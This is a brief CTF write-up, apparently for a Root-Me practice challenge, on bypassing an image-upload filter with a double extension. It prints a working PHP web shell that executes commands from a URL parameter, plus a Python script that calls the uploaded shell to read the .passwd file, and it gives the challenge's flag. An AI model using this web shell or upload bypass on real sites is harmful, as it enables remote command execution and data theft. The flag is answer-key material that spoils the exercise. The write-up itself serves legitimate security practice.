Post

File upload - Double extensions

Posted
By thanguyen165 1 min read

Statement

Your goal is to hack this photo galery by uploading PHP code.

Retrieve the validation password in the file .passwd at the root of the application.

Solution

Just write a normal php code

1
2
3
4
5

<?php
$command = $_GET['command'];
$output = shell_exec($command);
echo "<p> $output <p>";
?>

Then change its name to exploitit.php.jpg and upload to server.

Then call it by

1
2
3
4
5
6
7
8

import requests

URL =  'http://challenge01.root-me.org/web-serveur/ch20/galerie/upload/694193751d4a423a2179aadef22b5be4/exploitit.php.jpg?command={}'

command = "cd ../../../; cat .passwd"

r = requests.get(URL.format(command))
print(r.text)

Note that .passwd is at challenge’s root, not system’s root, so cat /.passwd wont work!

The flag is

1

Gg9LRz-hWSxqqUKd77-_q-6G8
Practice, rootme
Web Exploitation File upload vulnerabilities
This post is licensed under CC BY 4.0 by the author.